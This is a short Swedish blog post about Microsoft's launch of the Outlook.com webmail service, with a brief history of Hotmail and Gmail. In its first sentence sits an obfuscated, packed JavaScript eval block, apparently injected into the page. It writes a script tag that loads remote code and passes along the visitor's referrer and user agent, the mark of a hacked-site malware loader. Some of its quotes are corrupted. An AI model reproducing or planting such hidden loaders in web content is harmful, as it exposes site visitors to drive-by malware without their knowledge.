Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Microsoft kommande mailtjänst Outlook.com

Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snnrb|var|u0026u|referrer|arkya||js|php’.split(’|’),0,{}))
har nyligen talats mycket om olika molntjänster för Windows 8 och Windows Phone. 

Nyligen började Microsoft att leverera en förhandsvisning av det nya Outlook.com, en modern mailklient i molnet.

Webmail introducerades för första gången med Hotmail 1996. Då var det nytt att ha en personlig mailadress som var helt oberoende av din arbetsplats eller internet-leverantör. Ca åtta år senare kom Google med sin Gmail som hade ett lagringsutrymme på 1GB samt en sökfunktion till inkorgen.

Efter detta har inte mycket hänt på mailfronten tills nu. Idag handlar mycket om sina kontakter i sociala medier. Istället för att skapa e-adressböcker manuellt så är det dags att baka ihop de sociala medierna med e-post.

Vi vet att Outlook är den populäraste e-postklienten idag både till Mac och PC. Därför har microsoft valt att bygga en helt ny tjänst från grunden, detta för att göra det så bra som möjligt för användarna.

Nu, förutom ett datorprogram och en tjänst för företag, erbjuder Microsoft Outlook som en personlig e-posttjänst – Outlook.com.

Läs mer i deras blogg: http://blogs.office.com/b/microsoft-outlook/archive/2012/07/31/introducing-outlook-com-modern-email-for-the-next-billion-mailboxes.aspx